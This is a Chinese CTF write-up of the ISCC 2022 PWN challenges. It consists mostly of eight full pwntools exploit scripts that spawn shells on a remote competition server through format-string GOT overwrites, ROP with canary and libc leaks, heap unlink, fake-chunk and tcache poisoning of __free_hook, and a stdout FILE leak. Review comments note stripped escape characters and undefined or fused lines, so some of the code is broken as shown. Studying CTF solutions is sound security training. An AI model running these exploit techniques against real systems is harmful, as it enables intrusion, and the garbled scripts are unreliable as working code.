本文来自:天权网安生态圈
作者:天权Megrez
首言
最近我们参加了2022年ISCC信息安全与对抗技术竞赛,这是我们的WP-1,现在我们来看看这次比赛的题目和解答方法吧!今天我们主要讲解PWN方向的题目。
01
create_id
exp:
from pwn import *
# r=process("./31")
r = remote("123.57.69.203", "5310")
# The service prints a value first: 2 bytes are skipped (presumably a "0x" prefix —
# not verifiable from the script), then 8 hex characters are parsed as an address.
r.recv(2)
t = int(r.recv(8), 16)
print((t))
# Two menu selections of '1' before the format-string input is sent.
r.sendline('1')
r.recv()
r.sendline('1')
r.recv()
# Format-string write primitive: the format argument is at offset 10, and the value 9
# is written to address t. Defensive note: this primitive only exists when user input
# reaches a printf-family format argument; -Wformat -Werror=format-security flags such calls.
# NOTE(review): str payloads are mixed with pwntools helpers here and in script 02 (Python 2
# print statements), so the author's interpreter was probably Python 2 — confirm before reuse.
pay = fmtstr_payload(10, {(t): 9})
r.sendline(pay)
r.interactive()
ISCC{6265-32f2-46d3-b7ff-3c20}
02
sim_treasure
exp:
from pwn import *
context.log_level='debug'
#io=process("./sp1")
io=remote("123.57.69.203", 7010)
elf = ELF("./sp1")
libc = ELF("./libc-2.27.so")
puts_got = elf.got['puts']
# NOTE(review): "...word?n" is almost certainly "...word?\n" with the backslash lost
# during extraction; the same applies to "An" further down.
io.recvuntil("Can you find the magic word?n")
# Step 1 — leak: the GOT slot of puts is placed at the start of the input and "%6$s"
# makes the vulnerable format call print the 4 bytes stored there (the resolved puts address).
pay_1 = p32(elf.got["puts"])+"%6$s"
io.sendline(pay_1)
io.recv(4)
puts_addr = u32(io.recv(4))
# Python 2 print statements: this script does not run unmodified on Python 3.
print "puts_got="+hex(puts_addr)
printf_got = elf.got['printf']
print "printf_got="+hex(printf_got)
# Step 2 — libc base from the leaked puts address, then system's address in the same libc.
libc_base = puts_addr - libc.symbols['puts']
system_addr=libc_base+libc.symbols['system']
print "system_addr="+hex(system_addr)
io.sendline("A")
# Step 3 — second format-string write replaces printf's GOT entry with system, so a later
# printf(user_input) presumably becomes system("/bin/sh").
# Defensive note: this write requires a writable GOT; Full RELRO (-Wl,-z,relro,-z,now)
# makes it read-only. The binary's protections are not shown on this page.
payload1=fmtstr_payload(6,{printf_got: system_addr})
io.recvuntil("An")
io.sendline(payload1)
io.sendline("/bin/sh")
io.interactive();
ISCC{5239-97f2-482b-bdaf-4ab5}
03
跳一跳
exp:
from pwn import *
context.log_level = 'debug'
p = remote('123.57.69.203', 7020)
elf = ELF('./pwn2')
p.recvuntil('~')
# Input phase: 232-15 lines of '255', then 13 lines of '+', then two more '255'.
# What the target does with these inputs is not visible from the script.
for i in range(232 - 15):
    p.sendline(b'255')
for i in range(7):
    p.sendline(b'+')
for i in range(6):
    p.sendline('+')
for i in range(2):
    p.sendline(b'255')
# main=elf.sym['main']
# NOTE(review): escape sequences lost their backslashes in extraction: 'xff' is '\xff',
# b'x7f' is b'\x7f', 'xffxff' is '\xff\xff'; the b' ' pads are most likely b'\x00'.
p.recvuntil('xff' * (232 - 15))
# Leaks read back from the program's output: 7 canary bytes (the low byte of a glibc canary
# is typically 0, which is why one byte is prepended), a stack address (6 bytes ending in 0x7f),
# and a code address.
canary = u64(b' ' + p.recv(7))
success('canary:' + hex(canary))
stack_addr=u64(p.recvuntil(b'x7f')[-6:]+ b' ')
success('stack:' + hex(stack_addr))
p.recvuntil('xffxff')
# PIE base: leaked code address minus 24 minus main's offset; the 24 is the author's
# constant for the distance from main to the leaked address and is not verifiable here.
code_base = u64(p.recv(6) + b' ') - 24 - elf.sym['main']
success('code_base:' + hex(code_base))
# 0x000000000000124a : leave ; ret
leave = 0x124a + code_base
# 0x000000000000130b : pop rdi ; ret
pop_rdi = 0x130b + code_base
# NOTE(review): `payload(...)` here and below is a transcription slip — `payload` is never
# defined, so evaluating this line raises NameError; it is almost certainly `payload = (...)`.
# Stage 1 chain: puts(puts@got) to leak libc, then return to main; padded to 0xd8, followed by
# the canary, a saved-rbp value inside the leaked stack region (stack_addr-0xf8) and a leave;ret pivot.
payload(p64(pop_rdi)+p64(code_base+elf.got['puts'])+p64(code_base+elf.sym['puts'])+p64(pop_rdi+1)+p64(code_base+elf.sym['main'])).ljust(0xd8,b'a')+p64(canary)+p64(stack_addr-0xf8)+ p64(leave)
p.send(payload)
# libc base: leaked puts address minus the author's constant 0x0809c0 (presumably puts'
# offset in the target libc — not verifiable here).
libc_addr = u64(p.recvuntil(b'x7f')[-6:].ljust(8, b' ')) - 0x0809c0
success('libc_addr:' + hex(libc_addr))
# Second pass through main: same input pattern, canary re-read from the output.
p.recvuntil('~')
for i in range(232 - 15):
    p.sendline(b'255')
for i in range(7):
    p.sendline(b'+')
for i in range(8):
    p.sendline('+')
p.recvuntil('xff' * (232 - 15))
canary = u64(b' ' + p.recv(7))
success('canary:' + hex(canary))
# Stage 2 chain: pop rdi; <libc+0x1b3e9a>; <libc+0x04f440>. Both offsets are the author's
# constants for this libc build (not verifiable here); the pivot target is 0xd0 lower than in stage 1.
payload(p64(pop_rdi)+p64(libc_addr+0x1b3e9a)+p64(0x04f440+libc_addr)).ljust(0xd8,b'a') + p64(canary) + p64(stack_addr - 0xf8 - 0xd0) + p64(leave)
# gdb.attach(p)
p.send(payload)
p.interactive()
ISCC{65eb-c6ea-45cb-a65c-453c}
04
unlink
exp:
from pwn import *
# r=process('./attachment-38')
# gdb.attach(r)
# Remote handle shared by the add()/dele() helpers defined below.
context.log_level = 'debug'
r = remote('123.57.69.203', '5810')
def add(idx, size, data):
    """Drive the service's "add" command: answer the Index/Size/Data prompts with idx, size, data.

    Uses the module-level connection `r`. `data` is sent with sendline, so a newline is appended.
    """
    r.sendline("add")
    r.recvuntil("Index: ")
    r.sendline(str(idx))
    r.recvuntil("Size: ")
    r.sendline(str(size))
    r.recvuntil("Data: ")
    r.sendline(data)
def dele(idx):
    """Drive the service's "remove" command for slot idx, using the module-level connection `r`."""
    r.sendline("remove")
    r.recvuntil("Index: ")
    r.sendline(str(idx))
# NOTE(review): `target` is assigned but never referenced below.
target = 0x601008
# Four allocations (0x40, 0x80, 0x80, 0x20), then slots 0, 2 and 1 are freed in that order.
add(0, 0x40, '')
add(1, 0x80, '')
add(2, 0x80, '')
add(3, 0x20, 'HRP')
dele(0)
dele(2)
dele(1)
# NOTE(review): the next two calls were fused onto one line in the original page
# (`...p64(0x601018))add(1,...`), which is a syntax error; they are split here.
# Slot 0 is refilled with 0x40 bytes of padding followed by what looks like a forged chunk
# header (prev_size 0, size 0x91) and a pointer into the binary's data segment (0x601018) —
# i.e. data written past the 0x40 the slot was sized for. Confirm against the binary.
add(0,0x40,'a'*0x40+p64(0)+p64(0x91)+p64(0x601018))
add(1,0x80,p64(0x6001030))
# NOTE(review): 'x96x08x40' is '\x96\x08\x40' with backslashes stripped — the low 3 bytes of an
# address (0x400896 little-endian), presumably inside the binary; not verifiable here.
add(1,0x80,p64(0x6001030)+ 'x96x08x40')
r.sendline('/bin/sh')
r.interactive()
ISCC{4cc2-9473-4417-a556-ec4a}
05
untidy_note
exp:
from pwn import *
# r=process('./pwn3')
# Remote handle shared by the add/edit/show/dele helpers defined below.
r = remote("123.57.69.203", "7030")
context.log_level = 'debug'
# Target libc: glibc 2.27 symbols are used below for __free_hook and system.
libc = ELF('libc-2.27.so')
def add(how):
    """Menu option 1: allocate a note of size `how` (module-level connection `r`).

    NOTE(review): "is:n" is most likely "is:\n" with the backslash lost in extraction;
    the same applies to ":n" in the other helpers.
    """
    r.recvuntil("is:n")
    r.sendline("1")
    r.recvuntil("is:n")
    r.sendline(str(how))
def edit(which, how, what):
    """Menu option 3: write `what` (length `how`) into note `which` (module-level connection `r`)."""
    r.recvuntil("is:n")
    r.sendline("3")
    r.recvuntil(":n")
    r.sendline(str(which))
    r.recvuntil("is:n")
    r.sendline(str(how))
    r.recvuntil(":n")
    r.sendline(what)
def show(which):
    """Menu option 4: print the content of note `which` (module-level connection `r`)."""
    r.recvuntil("is:n")
    r.sendline("4")
    r.recvuntil(":n")
    r.sendline(str(which))
def dele(which):
    """Menu option 2: free note `which` (module-level connection `r`).

    Unlike the other helpers this one uses recvline() rather than recvuntil(":n") before
    sending the index.
    """
    r.recvuntil("is:n")
    r.sendline("2")
    r.recvline()
    r.sendline(str(which))
# gdb.attach(r)
r.recv()
r.sendline('1')
# Ten notes of size 30, then the first eight are freed.
for i in range(10):
    add(30)
for i in range(8):
    dele(i)
r.recv()
r.sendline('1' * 0x400)
# Note 7 is shown after it was freed, and 6 bytes of its content minus the author's constant
# 0x3ebcc0 are taken as the libc base (presumably an arena pointer left in the freed chunk —
# not verifiable here). NOTE(review): 'x00' is '\x00' with the backslash lost in extraction.
show(7)
r.recvuntil("Content:")
base = u64(r.recv(6) + 'x00' * 2) - 0x3ebcc0
print(hex(base))
# raw_input()
free_hook = base + libc.sym['__free_hook']
sys = base + libc.sym['system']
# Note 1 was already freed above, yet it is edited here: the freed chunk's content
# (its forward pointer) is overwritten with free_hook — the underlying bug is a write to a
# freed note. Defensive note: __free_hook no longer exists in glibc >= 2.34, and a use-after-free
# check in the note table (clearing the pointer on free) would stop this at the source.
edit(1, 30, p64(free_hook) * 2)
for i in range(7):
    add(30)
# NOTE(review): "/bin/shx00" is "/bin/sh\x00" with the backslash lost in extraction.
edit(4, 30, "/bin/shx00")
edit(8, 30, p64(sys))
dele(4)
r.interactive()
ISCC{e484-edee-4788-bb33-ead3}
06
h-o-s
exp:
from pwn import *
#r=process('./attachment-39')
# Remote handle shared by the fill()/get() helpers defined below.
r=remote('123.57.69.203','5820')
context.log_level='debug'
def fill(size,str1):
    """Send the "fill" command, then `size`, then `str1`, pausing 0.1s between lines.

    No prompts are waited for (sleep() is used instead), so this is timing-dependent.
    Uses the module-level connection `r`.
    """
    r.sendline("fill")
    sleep(0.1)
    r.sendline(str(size))
    sleep(0.1)
    r.sendline(str1)
def get():
    """Send the "get" command on the module-level connection `r`."""
    r.sendline("get")
# Twice: 0x60 bytes of padding followed by what looks like a forged chunk header (prev_size 0,
# size 0x411) and two pointers into the binary's data segment (0x601018, 0x601110), then "get".
# The challenge name "h-o-s" suggests a House-of-Spirit style fake chunk, but the script alone
# does not confirm that.
r.sendline('a'*0x60+p64(0)+p64(0x411)+p64(0x601018)+p64(0x601110))
get()
r.sendline('a'*0x60+p64(0)+p64(0x411)+p64(0x601018)+p64(0x601110))
get()
# Two 0x400-byte fills: the first stores 0x601018, the second 0x6001030 followed by 0x400806
# (presumably an address in the binary — not verifiable here).
fill(0x400,p64(0x601018))
fill(0x400,p64(0x6001030)+p64(0x400806))
r.sendline("/bin/sh")
r.interactive()
ISCC{af31-219c-4214-b561-930e}
07
heapheap
exp:
from pwn import *
def add(size, con):
    """Menu option 1: allocate `size` bytes and send `con` as content (with send, no newline).

    Relies on the global `r`, which is only assigned inside the retry loop at the bottom of the script.
    """
    r.recvuntil("Please input your choice: ")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.send(con)
def dele(index):
    """Menu option 2: free slot `index` (global connection `r`)."""
    r.recvuntil("Please input your choice: ")
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(index))
def pwn():
    """One attempt against the service; returns the concatenated output of the two "cat" commands.

    Uses the globals `r` and the add()/dele() helpers. Offsets and byte strings below are the
    author's constants for the target's libc-2.27 and heap layout; they are not verifiable here.
    NOTE(review): the escape sequences ('x50x9a', 'x60xe7', 'x7f', 'x00', ...) lost their
    backslashes in extraction ('\x50\x9a' etc.).
    """
    # Layout: ten chunks — six of 0xf0, one of 0xf0, one of 0x80, two of 0xf0.
    for i in range(6):
        add(0xf0, 'a') # 0-5
    add(0xf0, 'a') # 6
    add(0x80, 'a') # 7
    add(0xf0, 'a') # 8
    add(0xf0, 'a') # 9
    for i in range(6):
        dele(i)
    dele(9)
    dele(6)
    dele(7)
    # Slot 7 (0x80) is reallocated with 0x88 bytes and the last 8 bytes overwrite the next
    # chunk's size field with 0x190 — a write past the requested size.
    add(0x88, 'a' * 0x80 + p64(0x90 + 0x100))
    dele(8)
    for i in range(9):
        add(0xf0, '1')
    for i in range(8, 5, -1):
        dele(i)
    dele(9)
    dele(0)
    # Partial-pointer overwrites (2 low bytes) of freed chunks' forward pointers.
    add(0xf0, 'x50x9a')
    add(0xf0, 'x50x9a')
    add(0xf0, p64(0) + p64(0x91) + 'x60xe7')
    dele(0)
    dele(6)
    add(0xf0, 'x60x9a')
    add(0xf0, 'x60x9a')
    # 0xFBAD1887 followed by three zeros and a single 0x00 byte: this matches the widely
    # documented stdout FILE-structure flag value used to make the program print libc memory —
    # presumably that is the leak mechanism here; confirm with a debugger.
    add(0xf0, p64(0x0FBAD1887) + p64(0) * 3 + p8(0x00))
    add(0xf0, p64(0x0FBAD1887) + p64(0) * 3 + p8(0x00))
    # libc base: a leaked 6-byte address ending in 0x7f minus the author's constant 0x3ed8b0.
    libc_base=u64(r.recvuntil('x7f', timeout=1)[-6:].ljust(8, 'x00')) - 0x3ed8b0
    log.info("libc_base:" + hex(libc_base))
    # Author's constant: libc_base + 0x61b060 + 3840 (0xf00); its meaning is not shown on the page.
    free = libc_base + 0x61b060 + 3840
    print(hex(free))
    dele(1)
    dele(2)
    dele(0)
    dele(6)
    add(0xf0, p64(free))
    # add(0xf0,'cat flagx00')
    # 0x10a428 is another author's constant relative to libc base (not verifiable here).
    add(0xf0, p64(0x10a428 + libc_base))
    add(0xf0, p64(0x10a428 + libc_base))
    r.recv()
    r.sendline("3")
    # Two attempts at reading the flag file; both outputs are returned for the caller's check.
    r.sendline("cat flag.txt")
    a = r.recv()
    r.sendline("cat flag")
    b = r.recv()
    return a + b
# Retry loop: the attempt is repeated until the returned output contains "{" (a flag).
# The heap offsets in pwn() depend on partial-pointer guesses, so individual runs can fail.
while 1:
    try:
        # NOTE(review): `r` is bound to a local process and then immediately rebound to the
        # remote connection, so every iteration leaks an unclosed local process handle; the
        # process() line looks like a leftover from local testing.
        r = process('./heapheap')
        libc = ELF("libc-2.27.so")
        r = remote("123.57.69.203", "5320")
        # context.log_level='debug'
        # gdb.attach(r)
        a = pwn()
        print(a)
        if "{" in a:
            break
    except Exception as e:
        # Any failure (EOF, timeout, parse error) just closes the connection and retries;
        # the exception itself is not logged.
        r.close()
ISCC{6378-9273-4f96-b0d9-6fe6}
08
Huge_Space
exp:
# NOTE(review): `time` is imported but never used in this script.
import time
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
# Short aliases over the connection `p`, which is assigned further down the script;
# each lambda resolves `p` at call time.
r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()
def add(idx, size, con):
    """Send the "+++" command and answer the Index/Size/Data prompts with idx, size, con."""
    sl("+++")
    sla('Index:',str(idx))
    sla('Size: ', str(size))
    sla('Data: ',con)
def show(idx, size):
    """Send the "print" command for slot idx with the given size. Defined but not called below."""
    sl("print")
    sla('Index:',str(idx))
    sla('Size: ', str(size))
# p = process('./pwn')
p = remote('123.57.69.203','5330')
elf = ELF('./pwn')
system = elf.plt['system']
strncmp = elf.got['strncmp']
# gdb.attach(p ,'b *0x400A20') #malloc
# NOTE(review): 'n' is most likely '\n' with the backslash lost in extraction.
s('n')
# Slot 0 is sized 0x10 but receives 0x18 bytes of padding plus an 8-byte all-ones value —
# a write past the requested size (the next chunk's size field, presumably).
add(0, 0x10, 'a'*0x18+p64(0xffffffffffffffff))
# A negative size is accepted by the service: the allocator is steered backwards by 0x1240.
# Defensive note: size parameters should be validated as unsigned and bounded before use.
add(1, -0x1240, 'b'*8)
# The GOT entry of strncmp is replaced with system's PLT stub, so a later strncmp(input, ...)
# presumably runs system("/bin/sh"). The binary's RELRO setting is not shown; Full RELRO
# would make this slot read-only.
add(3, 0x10, p64(strncmp))
add(4, 0x30, p64(system))
sl('/bin/sh')
# debug()
shell()
ISCC{1e74-6dcc-40af-a179-42ad}
总结
今天我们公布的主要是关于练武题中PWN方向的题目,其他方向的题目将会在未来几天陆续公布,敬请期待!
原文始发于微信公众号(天权信安):2022年ISCC信息安全与对抗技术竞赛WP-1(1)